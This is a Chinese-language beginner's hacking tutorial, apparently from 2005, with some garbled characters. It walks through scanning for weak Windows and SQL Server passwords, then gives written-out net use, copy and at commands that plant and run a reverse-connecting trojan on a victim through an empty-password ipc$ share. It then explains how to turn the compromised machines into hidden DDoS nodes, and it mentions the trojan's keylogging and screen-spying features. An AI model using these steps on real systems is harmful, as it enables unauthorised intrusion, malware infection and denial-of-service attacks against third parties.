新手之掃描、入侵,、攻擊全攻略
|
|
|
| http://web. 時(shí)間:2005年6月15日 點(diǎn)擊:
1639 來(lái)源:未知 |
一,、掃描
掃描軟件在網(wǎng)絡(luò)上很多,功能也各一,在這里我推薦大家用x-scan2.0,,下載地http://www./download/show.php?id=473
下載解壓后,,運(yùn)行x-scan-gui,在“掃描模塊”里只選“nt-server弱口令“和“sql-server弱口令”這兩項(xiàng),;在“掃描參數(shù)”里“基本設(shè)置”選項(xiàng)設(shè)置你要掃描的ip地址,;在“端口相關(guān)設(shè)置”里“待檢測(cè)端口”輸入你要掃描的端口,在這里可以只掃描1433和3389這兩個(gè)端口,,其它的不變,。一切準(zhǔn)備好后就開(kāi)始掃描,要不了多久就會(huì)出現(xiàn)結(jié)果,。
二,、入侵
在這里我們要用到一個(gè)木馬,我推薦大家用“灰鴿子”,,它是一個(gè)反彈性木馬,,具有自動(dòng)上線(xiàn)連接的功能,當(dāng)中木馬機(jī)器的ip地址變了時(shí)也會(huì)自動(dòng)上線(xiàn)連接,。
下載地http://www./download/show.php?id=446,。
下載解壓后有p-client.exe(在自己的機(jī)器上運(yùn)行的客戶(hù)端程序)和server.exe(在肉雞上運(yùn)行的程序)。我們要讓對(duì)方運(yùn)行server.exe程序(記住這個(gè)程序不要在自己的機(jī)器上運(yùn)行喲),。在讓對(duì)方運(yùn)行server.exe程序之前先配置server.exe程序(注意如果不配置這個(gè)程序即使對(duì)方運(yùn)行了我們上傳上去的server.exe程序,,我們也不能和他連接)。具體配置server的方http://www./article/show.php?id=357
比如我們剛才掃描到一臺(tái)ip為61.216.216.216的主機(jī),,administrator密碼為空,。我們要利用剛才掃描得到的nt弱口令,再用ipc$管道來(lái)連接,。具體如下:
1,、先和對(duì)方主機(jī)建立連接,操作如下:
net use \\61.216.216.216\ipc$ "" /user:"administrator"
2,、拷貝木馬程序到對(duì)方的機(jī)器的c盤(pán)下,,操作如下:
copy server.exe \\61.216.216.216\c$
3、查看對(duì)方時(shí)間,,操作如下:
net time \\61.216.216.216
4,、假設(shè)對(duì)方的時(shí)間為下午1:23,讓對(duì)方機(jī)器在13:25運(yùn)行木馬程序,,操作如下:
at \\61.216.216.216 13:25 c:\server.exe(注意對(duì)方的時(shí)間為12小時(shí)制,,我們用at命令時(shí)要轉(zhuǎn)換為24小時(shí)制,,讓對(duì)方運(yùn)行木馬的時(shí)間最好比對(duì)方機(jī)器的當(dāng)前時(shí)間多幾分鐘)
5,、查看木馬程序是否運(yùn)行,操作如下:
at \\61.216.216.216
如果清單為空,說(shuō)明木馬已運(yùn)行了,,這時(shí)我們可以在自己的機(jī)器上運(yùn)行p-client.exe,,剛才中了木馬的機(jī)器就會(huì)自動(dòng)來(lái)連接。
三,、攻擊
我寫(xiě)這篇文章的主要目的就是它,。我們?cè)谶@里要用到的一個(gè)攻擊軟件叫“獨(dú)裁者”,它是一個(gè)采用的是分布式拒絕服務(wù)攻擊的軟件,,下載下地http://www./usr/25/25_18196.zip
“獨(dú)裁者”的使用教程:
我們要讓肉雞運(yùn)行“獨(dú)裁者”的server.exe程序,。
在木馬“灰鴿子”里進(jìn)入ip為61.216.216.216的主機(jī)的c盤(pán),點(diǎn)右鍵“文件上傳自”找到“獨(dú)裁者”的server.exe點(diǎn)打開(kāi)既可,。當(dāng)程序上傳完后點(diǎn)刷新就可以看到我們剛才上傳的server.exe文件了,。右鍵點(diǎn)server.exe選“遠(yuǎn)程打開(kāi)”“隱藏運(yùn)行”,過(guò)一會(huì)我們就可以在
“獨(dú)裁者”里加61.216.216.216這個(gè)ip了,。
也許有人要問(wèn):“就是為什么我們要讓對(duì)方對(duì)行木馬,,我們不可以直接在dos下上傳“獨(dú)裁者”的server.exe文件并上它運(yùn)行就行了嗎?
在這里我要說(shuō)的就是“獨(dú)裁者”沒(méi)有自動(dòng)連接的功能,,如果肉雞不是固定的ip,,哪肉雞就只能用一次,因?yàn)槿怆u原來(lái)哪個(gè)ip變了呀,!這里的木馬就有自動(dòng)上線(xiàn)連接ip的功能,,即使肉雞的ip變了也能和連接。這樣肉雞就飛不了啦,!嘿嘿,!
其實(shí)這個(gè)的木馬還有很多功能,比如可以用來(lái)作代理,、查看對(duì)方屏幕,、記錄密碼等,這就要你自己去慢慢探索吧,。
以上全部在win2000里通過(guò),。
|
|
